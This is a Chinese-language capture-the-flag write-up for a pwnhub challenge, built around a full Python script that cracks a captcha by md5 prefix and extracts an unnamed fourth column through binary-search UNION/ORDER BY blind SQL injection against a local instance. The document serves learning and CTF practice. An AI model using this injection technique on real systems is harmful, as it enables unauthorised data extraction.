pwnhub二分法无列名盲注

这道题限制了SQL注入的次数为140次内,并且要求注入未知列名的一列的数据,从源码里可以得知该列在第四列.

可以通过这样的盲注来猜解数据:

但是我不会写二分法的脚本🙃

学习了小伙伴的脚本,自己又摸了一遍,才搞清楚.

#! /usr/bin/env python3
# Author : sn00py
# Date : 2017/10/28 14:22
# Email: 3022235906@qq.com
# Comment: 二分盲注 for pwnhub
import requests
import hashlib
import re
def brute_captcha():
    """Recover the numeric captcha whose md5 prefix the page echoes.

    Fetches ``target + '/flag.php'`` with the module-level ``cookies``,
    extracts the four hex characters the page prints in the form
    ``substr(md5(captcha), 0, 4)=XXXX`` and then walks the integers
    ``0..999999`` looking for the first one whose md5 hex digest starts
    with that prefix.

    Returns:
        The matching integer as a string; ``None`` (implicit) when no
        integer below 1000000 matches.

    Raises:
        AttributeError: when the page does not contain the expected
        ``substr(md5(captcha), 0, 4)=`` text (``re.search`` yields ``None``).
    """
    page = requests.session().get(target + '/flag.php', cookies=cookies)
    prefix = re.search(r"substr\(md5\(captcha\), 0, 4\)=(.{4})", page.text).group(1)
    print('当前$_SESSION[\'captcha\']:', prefix)
    for candidate in range(1000000):
        digest = hashlib.md5(str(candidate).encode('utf8')).hexdigest()
        # ``prefix`` is exactly four characters, so a startswith test equals
        # comparing the first four digest characters.
        if digest.startswith(prefix):
            found = str(candidate)
            print('爆破成功:', found)
            return found
def sqli_duihuanma():
    """Recover the value of the 4th (unnamed) column one character at a time.

    The candidate alphabet is the 36 characters ``0-9a-z``.  For each position
    a binary search over the *remaining* candidates is run: the current prefix
    plus one candidate is injected as column 4 of a UNION row, the result is
    ordered by that column with ``limit 0,1``, and the response is checked for
    the string ``'admin'`` to learn which row came first.  Every chosen
    character is removed from the alphabet, so the routine assumes the value
    is 36 characters long and never repeats a character; when a single
    candidate remains it is appended and the full string is returned.

    Reads the module-level ``target`` and ``cookies``.  ``times`` counts the
    requests sent so far and is printed after every recovered character.

    Returns:
        The recovered 36-character string.
    """
    string = '0123456789abcdefghijklmnopqrstuvwxyz'  # candidates still unused
    str = ''  # recovered prefix (shadows the builtin ``str``; kept as-is)
    i = 1  # position being recovered, 1..36
    times = 0  # total requests issued so far
    while i <= 36:
        if len(string) == 1:
            # Only one candidate left: it must be the final character.
            str += string
            return str
        left = 0
        right = len(string) - 1
        while 1:
            times += 1
            mid = int((left + right) / 2)
            url = target + "/profile.php?id=1 union select 1,'no',3,'%s%s',5 order by 4 limit 0,1" % (str, string[mid])
            res = requests.get(url, cookies=cookies)
            if 'admin' in res.text:
                # NOTE(review): presumably the real row sorted before the
                # injected guess, i.e. the secret is smaller than
                # prefix+string[mid] — confirm against profile.php.  ``right``
                # excludes ``mid`` while the else-branch keeps ``mid`` as a
                # candidate; the two checks below rely on that asymmetry.
                right = mid - 1
            else:
                left = mid
            if left == right:
                # Termination case 1: the bounds met, take that candidate.
                str += string[left]
                string = string.replace(string[left], '')
                break
            if right == left + 1:
                # Termination case 2: two candidates left; one more request
                # (not counted in ``times``) decides between them.
                url = target + "/profile.php?id=1 union select 1,'no',3,'%s%s',5 order by 4 limit 0,1" % (str, string[right])
                # NOTE(review): unlike the request above, no cookies= is
                # passed here — verify whether the endpoint needs the session.
                res = requests.get(url)
                if 'admin' in res.text:
                    str += string[left]
                    string = string.replace(string[left], '')
                    break
                else:
                    str += string[right]
                    string = string.replace(string[right], '')
                    break
        print('第%s次, secret:%s' % (times, str))
        i += 1
def get_flag():
    """Submit the recovered ``duihuanma`` and ``captcha`` and print the flag.

    POSTs both module-level values (set in ``__main__``) to
    ``target + '/flag.php'`` with the module-level ``cookies`` and prints the
    first ``flag{...}`` match found in the response body.

    Raises:
        AttributeError: when the response contains no ``flag{...}`` text
        (``re.search`` yields ``None``).
    """
    form = dict(duihuanma=duihuanma, captcha=captcha)
    reply = requests.post(target + '/flag.php', data=form, cookies=cookies)
    match = re.search(r"(flag{.+})", reply.text)
    print(match.group(0))
if __name__ == '__main__':
    # These names are read by the helpers above through the module namespace;
    # they cannot be renamed without touching every function.
    target = 'http://127.0.0.1/hub/'  # local instance; helpers prepend '/', giving '//flag.php'
    cookies = {"PHPSESSID": "72ion1p34vsppq9rpe38vd6hh6"}  # session cookie sent where cookies= is passed
    captcha = brute_captcha()  # also read by get_flag()
    duihuanma = sqli_duihuanma()  # also read by get_flag()
    get_flag()

主要是当时自己不会找临界条件,不知道什么时候break.

  • 临界条件1: 上下限相等的时候
  • 临界条件2: 上下限差1的时候